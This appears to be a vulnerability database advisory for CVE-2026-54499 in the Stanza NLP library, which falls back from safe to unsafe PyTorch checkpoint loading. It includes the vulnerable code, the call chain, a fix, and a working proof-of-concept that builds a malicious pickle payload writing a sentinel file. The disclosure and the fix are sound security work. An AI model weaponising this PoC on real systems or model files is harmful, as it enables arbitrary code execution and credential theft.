Mend.io Vulnerability Database
The largest open source vulnerability database
What is a Vulnerability ID?
New vulnerability? Tell us about it!
CVE-2026-54499
Published:June 19, 2026
Updated:June 21, 2026
Summary Stanza 1.12.0 attempts to safely load PyTorch checkpoint files using "torch.load(..., weights_only=True)", but automatically falls back to the fully unsafe "torch.load(..., weights_only=False)" when the safe load raises "pickle.UnpicklingError". Because the "UnpicklingError" condition is fully attacker-controllable, any ".pt" file that contains a single unsupported pickle global will trigger it. An attacker who can place a malicious pretrain or model file on disk (via supply-chain compromise, a poisoned model repository, or a shared model cache) can achieve arbitrary code execution on any machine that loads a Stanza NLP pipeline. Code execution occurs inside the Stanza pretrain-loading API, not merely by calling "torch.load" directly. Details The vulnerable code is in "pretrain.py#L59-L67" (https://github.com/stanfordnlp/stanza/blob/main/stanza/models/common/pretrain.py#L59-L67) (Stanza 1.12.0): try: data = torch.load(self.filename, lambda storage, loc: storage, weights_only=True) except UnpicklingError: data = torch.load(self.filename, lambda storage, loc: storage, weights_only=False) When "weights_only=True" is passed, PyTorch's deserializer raises "pickle.UnpicklingError" for any object whose class or callable is not on the safe-globals allowlist. This is the intended safety mechanism. However, Stanza catches that exception and immediately reloads the same attacker-controlled file with "weights_only=False", which invokes Python's full pickle deserializer and executes any "reduce" method in the file without restriction. The fallback is triggered reliably and intentionally: an attacker embeds one unsupported pickle global (e.g., "builtins.open") anywhere in an otherwise structurally valid Stanza pretrain state dict. The safe load rejects it; the unsafe reload runs it. The same try/except pattern exists in at least five additional loaders in Stanza 1.12.0: | File | Lines | |------|-------| | "stanza/models/common/pretrain.py" | 64–66 | | "stanza/models/coref/model.py" | 251–253, 329–331 | | "stanza/models/classifiers/trainer.py" | 80–82 | | "stanza/models/constituency/base_trainer.py" | 94–96 | Additionally, "stanza/models/lemma_classifier/base_model.py:127" calls "torch.load(filename, lambda storage, loc: storage)" with no "weights_only" argument at all, which defaults to "False" on any PyTorch < 2.6. The call chain from the public API to the vulnerable fallback is: stanza.models.common.foundation_cache.load_pretrain(path) → FoundationCache.load_pretrain(path) → stanza.models.common.pretrain.Pretrain(filename) → Pretrain.emb (property access triggers load) → Pretrain.load() → torch.load(..., weights_only=True) # raises UnpicklingError → torch.load(..., weights_only=False) # executes arbitrary pickle *** PoC Environment: Python 3.11, "stanza==1.12.0", "torch==2.12.0" Step 1: Install dependencies: pip install stanza==1.12.0 torch==2.12.0 Step 2: Save the following as "exploit.py": import os from pathlib import Path import torch import stanza from stanza.models.common.foundation_cache import FoundationCache, load_pretrain from stanza.models.common.vocab import VOCAB_PREFIX SENTINEL = "/tmp/stanza_rce_proof" MODEL = "/tmp/stanza_malicious.pt" class HarmlessPayload: """Demonstrates execution; writes a sentinel file.""" def init(self, path): self.path = path def reduce(self): return (open, (self.path, "w")) Build a structurally valid Stanza pretrain state dict with the payload embedded. words = VOCAB_PREFIX + ["hello"] state = { "vocab": { "lang": "", "idx": 0, "cutoff": 0, "lower": False, "_id2unit": words, "_unit2id": {w: i for i, w in enumerate(words)}, }, "emb": torch.zeros((len(words), 2), dtype=torch.float32), "payload": HarmlessPayload(SENTINEL), # ← the malicious object } torch.save(state, MODEL) Confirm safe-only load raises UnpicklingError and does NOT create sentinel. try: torch.load(MODEL, lambda s, l: s, weights_only=True) print("UNEXPECTED: safe load succeeded (no fallback needed)") except Exception as e: print(f"Control: safe load raised {type(e).name} : sentinel exists: {Path(SENTINEL).exists()}") Load through the real Stanza API. The fallback fires and the sentinel is created. cache = FoundationCache() pretrain = load_pretrain(MODEL, foundation_cache=cache) print(f"stanza={stanza.version} torch={torch.version}") print(f"emb_shape={tuple(pretrain.emb.shape)}") print(f"sentinel_exists={Path(SENTINEL).exists()}") print("VERDICT: ACTUAL_VULN_REAL_STANZA_PATH" if Path(SENTINEL).exists() else "VERDICT: UNPROVEN") Step 3 : Run: python exploit.py Expected output (confirmed): Control: safe load raised UnpicklingError : sentinel exists: False stanza=1.12.0 torch=2.12.0 emb_shape=(5, 2) sentinel_exists=True VERDICT: ACTUAL_VULN_REAL_STANZA_PATH The sentinel is created exclusively by the Stanza pretrain-loading API invoking the unsafe fallback : not by a direct "torch.load" call in the PoC. *** Impact Vulnerability class: CWE-502 : Deserialization of Untrusted Data Who is impacted: Any user, researcher, CI/CD pipeline, or production NLP service that loads a Stanza model pretrain file from a source that is not under the victim's exclusive cryptographic control. Concretely: - Developers who run "stanza.Pipeline(lang)" after downloading models from HuggingFace or GitHub - CI pipelines that automatically refresh Stanza models during builds - Research environments that share pretrain files over shared network storage or model repositories Attack prerequisites: The attacker must be able to place a malicious ".pt" pretrain file at a path that Stanza will load. Realistic delivery vectors include: - Compromise of a HuggingFace model repository hosting Stanza pretrain weights - Poisoning of a shared model cache directory (NFS, S3, artifact store) - A malicious pretrain file distributed via a third-party fine-tuning hub or research repo What an attacker achieves: Arbitrary code execution with the full privileges of the process running "stanza.Pipeline()", typically a developer workstation, a Jupyter notebook server, or a GPU training node. This allows credential theft (HuggingFace tokens, cloud IAM keys from environment variables), persistent backdoors, data exfiltration, and lateral movement in multi-tenant training infrastructure. Recommended fix: Remove the unsafe fallback entirely. If "weights_only=True" raises "UnpicklingError", fail closed: try: data = torch.load(self.filename, lambda storage, loc: storage, weights_only=True) except UnpicklingError as e: raise RuntimeError( f"Refusing to load legacy pretrain file {self.filename!r} with unsafe " "deserialization. Regenerate the file using a trusted Stanza migration tool." ) from e If legacy NumPy-containing pretrain files must be supported, use PyTorch's "add_safe_globals()" API to allowlist the specific NumPy dtypes required, rather than disabling all safety checks. Apply the same fix to all six affected loaders listed above.
Affected Packages
stanza (CONDA):
Affected version(s) >=1.1.1 <1.12.2
Fix Suggestion:
Update to version 1.12.2
stanza (PYTHON):
Affected version(s) >=0.1 <1.12.2
Fix Suggestion:
Update to version 1.12.2
Do you need more information?
Contact Us
CVSS v4
Base Score:
7.7
Attack Vector
NETWORK
Attack Complexity
HIGH
Attack Requirements
NONE
Privileges Required
NONE
User Interaction
PASSIVE
Vulnerable System Confidentiality
HIGH
Vulnerable System Integrity
HIGH
Vulnerable System Availability
HIGH
Subsequent System Confidentiality
NONE
Subsequent System Integrity
NONE
Subsequent System Availability
NONE
CVSS v3
Base Score:
7.5
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality
HIGH
Integrity
HIGH
Availability
HIGH
Weakness Type (CWE)
Use of Potentially Dangerous Function
Deserialization of Untrusted Data